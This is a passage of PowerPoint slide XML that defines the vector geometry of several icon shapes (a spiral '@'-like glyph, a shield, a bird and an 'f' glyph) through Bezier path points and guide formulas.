                  <a:cubicBezTo>
                    <a:pt x="3132098" y="3124925"/>
                    <a:pt x="2589274" y="2611359"/>
                    <a:pt x="2548384" y="2446988"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2411721" y="3024903"/>
                    <a:pt x="2005702" y="3164775"/>
                    <a:pt x="1746058" y="3093574"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1486414" y="3022373"/>
                    <a:pt x="990519" y="2612821"/>
                    <a:pt x="990519" y="2019783"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="990519" y="1500875"/>
                    <a:pt x="1249504" y="1067935"/>
                    <a:pt x="1593790" y="967808"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1642974" y="953504"/>
                    <a:pt x="1694009" y="949376"/>
                    <a:pt x="1746058" y="945992"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2004670" y="929176"/>
                    <a:pt x="2081338" y="1030119"/>
                    <a:pt x="2206475" y="1173924"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2194343" y="1061758"/>
                    <a:pt x="2187003" y="961165"/>
                    <a:pt x="2185910" y="877882"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2656644" y="803138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2828567" y="2099525"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2888366" y="2544108"/>
                    <a:pt x="3261961" y="2420799"/>
                    <a:pt x="3362812" y="2002360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3355320" y="1625023"/>
                    <a:pt x="3366534" y="1729632"/>
                    <a:pt x="3289926" y="1346695"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3290031" y="1346798"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3068547" y="637774"/>
                    <a:pt x="2419129" y="439933"/>
                    <a:pt x="1700745" y="575031"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="890947" y="727320"/>
                    <a:pt x="415476" y="1491783"/>
                    <a:pt x="571995" y="2274165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="728513" y="3056546"/>
                    <a:pt x="1580131" y="3572543"/>
                    <a:pt x="2267548" y="3408286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2796517" y="3281890"/>
                    <a:pt x="2641988" y="3320887"/>
                    <a:pt x="3194376" y="3072653"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3249441" y="3306078"/>
                    <a:pt x="3239115" y="3309742"/>
                    <a:pt x="3268026" y="3509545"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3021841" y="3717756"/>
                    <a:pt x="2685602" y="3836362"/>
                    <a:pt x="2347298" y="3904041"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1157336" y="4112956"/>
                    <a:pt x="289475" y="3581660"/>
                    <a:pt x="42617" y="2380068"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-204242" y="1178477"/>
                    <a:pt x="661862" y="219348"/>
                    <a:pt x="1594841" y="456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14E2E14-9B57-4A66-85E1-221EAEE17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6880" y="2771935"/>
              <a:ext cx="315652" cy="359610"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3456727" h="3938119">
                  <a:moveTo>
                    <a:pt x="1728364" y="1961325"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1726089" y="2407152"/>
                    <a:pt x="1737463" y="2812034"/>
                    <a:pt x="1735188" y="3257861"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2394830" y="3057694"/>
                    <a:pt x="2610919" y="2352560"/>
                    <a:pt x="2765594" y="1981796"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1728362" y="682044"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1355324" y="868563"/>
                    <a:pt x="1166530" y="952725"/>
                    <a:pt x="609247" y="1002767"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="606972" y="1330312"/>
                    <a:pt x="631992" y="1623739"/>
                    <a:pt x="704780" y="1964933"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1728363" y="1971757"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1728363" y="1541853"/>
                    <a:pt x="1728362" y="1111948"/>
                    <a:pt x="1728362" y="682044"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1723409" y="487996"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1725062" y="488690"/>
                    <a:pt x="1726712" y="489384"/>
                    <a:pt x="1728363" y="490064"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1730015" y="489384"/>
                    <a:pt x="1731666" y="488690"/>
                    <a:pt x="1733319" y="487996"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1733319" y="492131"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2179467" y="679460"/>
                    <a:pt x="2405896" y="769409"/>
                    <a:pt x="2817789" y="813808"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2971516" y="823489"/>
                    <a:pt x="3036247" y="875307"/>
                    <a:pt x="3033236" y="1061333"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3015439" y="2441328"/>
                    <a:pt x="2363638" y="3359629"/>
                    <a:pt x="1733319" y="3448048"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1733319" y="3450123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1728363" y="3449086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1723409" y="3450123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1723409" y="3448048"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1093089" y="3359629"/>
                    <a:pt x="441289" y="2441328"/>
                    <a:pt x="423491" y="1061333"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="420479" y="875307"/>
                    <a:pt x="485211" y="823489"/>
                    <a:pt x="638937" y="813808"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1050832" y="769409"/>
                    <a:pt x="1277261" y="679460"/>
                    <a:pt x="1723409" y="492131"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1722802" y="306889"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1722802" y="311530"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1222099" y="521767"/>
                    <a:pt x="967982" y="622713"/>
                    <a:pt x="505720" y="672542"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333196" y="683408"/>
                    <a:pt x="260550" y="741561"/>
                    <a:pt x="263929" y="950334"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="283902" y="2499079"/>
                    <a:pt x="1015407" y="3529669"/>
                    <a:pt x="1722802" y="3628902"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1722802" y="3631230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1728365" y="3630065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1733925" y="3631230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1733925" y="3628902"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2441322" y="3529669"/>
                    <a:pt x="3172826" y="2499079"/>
                    <a:pt x="3192800" y="950334"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3196179" y="741561"/>
                    <a:pt x="3123532" y="683408"/>
                    <a:pt x="2951007" y="672542"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2488747" y="622713"/>
                    <a:pt x="2234630" y="521767"/>
                    <a:pt x="1733925" y="311530"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1733925" y="306889"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1732071" y="307669"/>
                    <a:pt x="1730218" y="308445"/>
                    <a:pt x="1728365" y="309209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1726510" y="308445"/>
                    <a:pt x="1724659" y="307669"/>
                    <a:pt x="1722802" y="306889"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1721800" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1723991" y="923"/>
                    <a:pt x="1726176" y="1844"/>
                    <a:pt x="1728363" y="2749"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1730551" y="1844"/>
                    <a:pt x="1732737" y="923"/>
                    <a:pt x="1734926" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1734926" y="5497"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2325825" y="254550"/>
                    <a:pt x="2625718" y="374136"/>
                    <a:pt x="3171248" y="433164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3374850" y="446035"/>
                    <a:pt x="3460584" y="514926"/>
                    <a:pt x="3456595" y="762245"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3433024" y="2596936"/>
                    <a:pt x="2569749" y="3817807"/>
                    <a:pt x="1734926" y="3935360"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1734926" y="3938119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1728363" y="3936740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721800" y="3938119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1721800" y="3935360"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="886977" y="3817807"/>
                    <a:pt x="23703" y="2596936"/>
                    <a:pt x="132" y="762245"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-3858" y="514926"/>
                    <a:pt x="81876" y="446035"/>
                    <a:pt x="285478" y="433164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="831010" y="374136"/>
                    <a:pt x="1130903" y="254550"/>
                    <a:pt x="1721800" y="54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7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6065040D-3594-4BAC-A8C1-673E9B9D9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5543" y="2519661"/>
              <a:ext cx="338578" cy="33854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1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2612BCB4-6800-4D3F-84A7-B411A2B0064A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="2648398">
              <a:off x="8942310" y="2514803"/>
              <a:ext cx="148930" cy="380894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7806EA61-FF58-47E3-B6B3-7DE8F13A1EEA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8651645" y="4749636"/>
              <a:ext cx="318301" cy="317452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99B57F1-325B-4FFB-91E0-0B240A518703}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8268788" y="3120081"/>
              <a:ext cx="291831" cy="251871"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 241139 w 366142"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 316007"/>
                <a:gd name="connsiteX1" fmla="*/ 306633 w 366142"/>
                <a:gd name="connsiteY1" fmla="*/ 31202 h 316007"/>
                <a:gd name="connsiteX2" fmla="*/ 349699 w 366142"/>
                <a:gd name="connsiteY2" fmla="*/ 10558 h 316007"/>
                <a:gd name="connsiteX3" fmla="*/ 325569 w 366142"/>
                <a:gd name="connsiteY3" fmla="*/ 59830 h 316007"/>
                <a:gd name="connsiteX4" fmla="*/ 366142 w 366142"/>
                <a:gd name="connsiteY4" fmla="*/ 52395 h 316007"/>
                <a:gd name="connsiteX5" fmla="*/ 334454 w 366142"/>
                <a:gd name="connsiteY5" fmla="*/ 94697 h 316007"/>
                <a:gd name="connsiteX6" fmla="*/ 316939 w 366142"/>
                <a:gd name="connsiteY6" fmla="*/ 174999 h 316007"/>
                <a:gd name="connsiteX7" fmla="*/ 184305 w 366142"/>
                <a:gd name="connsiteY7" fmla="*/ 311458 h 316007"/>
                <a:gd name="connsiteX8" fmla="*/ 27716 w 366142"/>
                <a:gd name="connsiteY8" fmla="*/ 295316 h 316007"/>
                <a:gd name="connsiteX9" fmla="*/ 0 w 366142"/>
                <a:gd name="connsiteY9" fmla="*/ 281129 h 316007"/>
                <a:gd name="connsiteX10" fmla="*/ 0 w 366142"/>
                <a:gd name="connsiteY10" fmla="*/ 268036 h 316007"/>
                <a:gd name="connsiteX11" fmla="*/ 23178 w 366142"/>
                <a:gd name="connsiteY11" fmla="*/ 266110 h 316007"/>
                <a:gd name="connsiteX12" fmla="*/ 108726 w 366142"/>
                <a:gd name="connsiteY12" fmla="*/ 240807 h 316007"/>
                <a:gd name="connsiteX13" fmla="*/ 20535 w 366142"/>
                <a:gd name="connsiteY13" fmla="*/ 200079 h 316007"/>
                <a:gd name="connsiteX14" fmla="*/ 70653 w 366142"/>
                <a:gd name="connsiteY14" fmla="*/ 194871 h 316007"/>
                <a:gd name="connsiteX15" fmla="*/ 20899 w 366142"/>
                <a:gd name="connsiteY15" fmla="*/ 168840 h 316007"/>
                <a:gd name="connsiteX16" fmla="*/ 0 w 366142"/>
                <a:gd name="connsiteY16" fmla="*/ 146258 h 316007"/>
                <a:gd name="connsiteX17" fmla="*/ 0 w 366142"/>
                <a:gd name="connsiteY17" fmla="*/ 116697 h 316007"/>
                <a:gd name="connsiteX18" fmla="*/ 14104 w 366142"/>
                <a:gd name="connsiteY18" fmla="*/ 121836 h 316007"/>
                <a:gd name="connsiteX19" fmla="*/ 40441 w 366142"/>
                <a:gd name="connsiteY19" fmla="*/ 126434 h 316007"/>
                <a:gd name="connsiteX20" fmla="*/ 20722 w 366142"/>
                <a:gd name="connsiteY20" fmla="*/ 8541 h 316007"/>
                <a:gd name="connsiteX21" fmla="*/ 168525 w 366142"/>
                <a:gd name="connsiteY21" fmla="*/ 104817 h 316007"/>
                <a:gd name="connsiteX22" fmla="*/ 165796 w 366142"/>
                <a:gd name="connsiteY22" fmla="*/ 68430 h 316007"/>
                <a:gd name="connsiteX23" fmla="*/ 241139 w 366142"/>
                <a:gd name="connsiteY23" fmla="*/ 0 h 3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142" h="316007">
                  <a:moveTo>
                    <a:pt x="241139" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="265040" y="0"/>
                    <a:pt x="292051" y="14516"/>
                    <a:pt x="306633" y="31202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327151" y="29858"/>
                    <a:pt x="335397" y="19692"/>
                    <a:pt x="349699" y="10558"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="343170" y="29574"/>
                    <a:pt x="336047" y="54091"/>
                    <a:pt x="325569" y="59830"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="340338" y="61437"/>
                    <a:pt x="353079" y="55334"/>
                    <a:pt x="366142" y="52395"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="361514" y="66282"/>
                    <a:pt x="342655" y="74263"/>
                    <a:pt x="334454" y="94697"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326254" y="115131"/>
                    <a:pt x="329982" y="126199"/>
                    <a:pt x="316939" y="174999"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="296102" y="242622"/>
                    <a:pt x="276174" y="279635"/>
                    <a:pt x="184305" y="311458"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152057" y="320905"/>
                    <a:pt x="83508" y="315693"/>
                    <a:pt x="27716" y="295316"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="281129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="268036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23178" y="266110"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="63548" y="261698"/>
                    <a:pt x="90116" y="254801"/>
                    <a:pt x="108726" y="240807"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87700" y="241375"/>
                    <a:pt x="35310" y="244403"/>
                    <a:pt x="20535" y="200079"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37583" y="203299"/>
                    <a:pt x="59856" y="197334"/>
                    <a:pt x="70653" y="194871"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57204" y="189662"/>
                    <a:pt x="37595" y="181773"/>
                    <a:pt x="20899" y="168840"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="146258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="116697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14104" y="121836"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="23887" y="123910"/>
                    <a:pt x="33812" y="125203"/>
                    <a:pt x="40441" y="126434"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9945" y="103325"/>
                    <a:pt x="-5039" y="60063"/>
                    <a:pt x="20722" y="8541"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76047" y="73391"/>
                    <a:pt x="116697" y="97001"/>
                    <a:pt x="168525" y="104817"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166649" y="98530"/>
                    <a:pt x="164888" y="89662"/>
                    <a:pt x="165796" y="68430"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166838" y="44047"/>
                    <a:pt x="190944" y="0"/>
                    <a:pt x="241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CDE015-9AA0-4BE4-A6D9-52CC6CFD2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9375" y="4197069"/>
              <a:ext cx="172150" cy="348350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst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432915 w 432915"/>
                <a:gd name="connsiteY2" fmla="*/ 455920 h 455920"/>
                <a:gd name="connsiteX3" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY3" fmla="*/ 455920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367184 w 432915"/>
                <a:gd name="connsiteY8" fmla="*/ 6 h 455920"/>
                <a:gd name="connsiteX9" fmla="*/ 399197 w 432915"/>
                <a:gd name="connsiteY9" fmla="*/ 2823 h 455920"/>
                <a:gd name="connsiteX10" fmla="*/ 393797 w 432915"/>
                <a:gd name="connsiteY10" fmla="*/ 69600 h 455920"/>
                <a:gd name="connsiteX11" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY11" fmla="*/ 96177 h 455920"/>
                <a:gd name="connsiteX12" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY12" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX13" fmla="*/ 391059 w 432915"/>
                <a:gd name="connsiteY13" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX14" fmla="*/ 385514 w 432915"/>
                <a:gd name="connsiteY14" fmla="*/ 215050 h 455920"/>
                <a:gd name="connsiteX15" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY15" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX16" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY16" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX17" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY17" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX18" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY18" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX19" fmla="*/ 173888 w 432915"/>
                <a:gd name="connsiteY19" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX20" fmla="*/ 173888 w 432915"/>
                <a:gd name="connsiteY20" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX21" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY21" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX22" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY22" fmla="*/ 90429 h 455920"/>
                <a:gd name="connsiteX23" fmla="*/ 228151 w 432915"/>
                <a:gd name="connsiteY23" fmla="*/ 89940 h 455920"/>
                <a:gd name="connsiteX24" fmla="*/ 324674 w 432915"/>
                <a:gd name="connsiteY24" fmla="*/ 971 h 455920"/>
                <a:gd name="connsiteX25" fmla="*/ 367184 w 432915"/>
                <a:gd name="connsiteY25" fmla="*/ 6 h 455920"/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313271 w 432915"/>
                <a:gd name="connsiteY2" fmla="*/ 455920 h 455920"/>
                <a:gd name="connsiteX3" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY3" fmla="*/ 455355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0 w 432915"/>
                <a:gd name="connsiteY8" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX9" fmla="*/ 367184 w 432915"/>
                <a:gd name="connsiteY9" fmla="*/ 6 h 455920"/>
                <a:gd name="connsiteX10" fmla="*/ 399197 w 432915"/>
                <a:gd name="connsiteY10" fmla="*/ 2823 h 455920"/>
                <a:gd name="connsiteX11" fmla="*/ 393797 w 432915"/>
                <a:gd name="connsiteY11" fmla="*/ 69600 h 455920"/>
                <a:gd name="connsiteX12" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY12" fmla="*/ 96177 h 455920"/>
                <a:gd name="connsiteX13" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY13" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX14" fmla="*/ 391059 w 432915"/>
                <a:gd name="connsiteY14" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX15" fmla="*/ 385514 w 432915"/>
                <a:gd name="connsiteY15" fmla="*/ 215050 h 455920"/>
                <a:gd name="connsiteX16" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY16" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX17" fmla="*/ 313271 w 432915"/>
                <a:gd name="connsiteY17" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX18" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY18" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX19" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY19" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX20" fmla="*/ 173888 w 432915"/>
                <a:gd name="connsiteY20" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX21" fmla="*/ 173888 w 432915"/>
                <a:gd name="connsiteY21" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX22" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY22" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX23" fmla="*/ 228291 w 432915"/>
                <a:gd name="connsiteY23" fmla="*/ 90429 h 455920"/>
                <a:gd name="connsiteX24" fmla="*/ 228151 w 432915"/>
                <a:gd name="connsiteY24" fmla="*/ 89940 h 455920"/>
                <a:gd name="connsiteX25" fmla="*/ 324674 w 432915"/>
                <a:gd name="connsiteY25" fmla="*/ 971 h 455920"/>
                <a:gd name="connsiteX26" fmla="*/ 367184 w 432915"/>
                <a:gd name="connsiteY26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355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0 w 399197"/>
                <a:gd name="connsiteY7" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX8" fmla="*/ 367184 w 399197"/>
                <a:gd name="connsiteY8" fmla="*/ 6 h 455920"/>
                <a:gd name="connsiteX9" fmla="*/ 399197 w 399197"/>
                <a:gd name="connsiteY9" fmla="*/ 2823 h 455920"/>
                <a:gd name="connsiteX10" fmla="*/ 393797 w 399197"/>
                <a:gd name="connsiteY10" fmla="*/ 69600 h 455920"/>
                <a:gd name="connsiteX11" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY11" fmla="*/ 96177 h 455920"/>
                <a:gd name="connsiteX12" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY12" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX13" fmla="*/ 391059 w 399197"/>
                <a:gd name="connsiteY13" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX14" fmla="*/ 385514 w 399197"/>
                <a:gd name="connsiteY14" fmla="*/ 215050 h 455920"/>
                <a:gd name="connsiteX15" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY15" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX16" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY16" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX17" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY17" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX18" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY18" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX19" fmla="*/ 173888 w 399197"/>
                <a:gd name="connsiteY19" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX20" fmla="*/ 173888 w 399197"/>
                <a:gd name="connsiteY20" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX21" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY21" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX22" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY22" fmla="*/ 90429 h 455920"/>
                <a:gd name="connsiteX23" fmla="*/ 228151 w 399197"/>
                <a:gd name="connsiteY23" fmla="*/ 89940 h 455920"/>
                <a:gd name="connsiteX24" fmla="*/ 324674 w 399197"/>
                <a:gd name="connsiteY24" fmla="*/ 971 h 455920"/>
                <a:gd name="connsiteX25" fmla="*/ 367184 w 399197"/>
                <a:gd name="connsiteY25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920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367184 w 399197"/>
                <a:gd name="connsiteY7" fmla="*/ 6 h 455920"/>
                <a:gd name="connsiteX8" fmla="*/ 399197 w 399197"/>
                <a:gd name="connsiteY8" fmla="*/ 2823 h 455920"/>
                <a:gd name="connsiteX9" fmla="*/ 393797 w 399197"/>
                <a:gd name="connsiteY9" fmla="*/ 69600 h 455920"/>
                <a:gd name="connsiteX10" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY10" fmla="*/ 96177 h 455920"/>
                <a:gd name="connsiteX11" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY11" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX12" fmla="*/ 391059 w 399197"/>
                <a:gd name="connsiteY12" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX13" fmla="*/ 385514 w 399197"/>
                <a:gd name="connsiteY13" fmla="*/ 215050 h 455920"/>
                <a:gd name="connsiteX14" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY14" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX15" fmla="*/ 313271 w 399197"/>
                <a:gd name="connsiteY15" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX16" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY16" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX17" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY17" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX18" fmla="*/ 173888 w 399197"/>
                <a:gd name="connsiteY18" fmla="*/ 216436 h 455920"/>
                <a:gd name="connsiteX19" fmla="*/ 173888 w 399197"/>
                <a:gd name="connsiteY19" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX20" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY20" fmla="*/ 140898 h 455920"/>
                <a:gd name="connsiteX21" fmla="*/ 228291 w 399197"/>
                <a:gd name="connsiteY21" fmla="*/ 90429 h 455920"/>
                <a:gd name="connsiteX22" fmla="*/ 228151 w 399197"/>
                <a:gd name="connsiteY22" fmla="*/ 89940 h 455920"/>
                <a:gd name="connsiteX23" fmla="*/ 324674 w 399197"/>
                <a:gd name="connsiteY23" fmla="*/ 971 h 455920"/>
                <a:gd name="connsiteX24" fmla="*/ 367184 w 399197"/>
                <a:gd name="connsiteY24" fmla="*/ 6 h 455920"/>
                <a:gd name="connsiteX0" fmla="*/ 139383 w 225309"/>
                <a:gd name="connsiteY0" fmla="*/ 455355 h 455920"/>
                <a:gd name="connsiteX1" fmla="*/ 139383 w 225309"/>
                <a:gd name="connsiteY1" fmla="*/ 455920 h 455920"/>
                <a:gd name="connsiteX2" fmla="*/ 139383 w 225309"/>
                <a:gd name="connsiteY2" fmla="*/ 455355 h 455920"/>
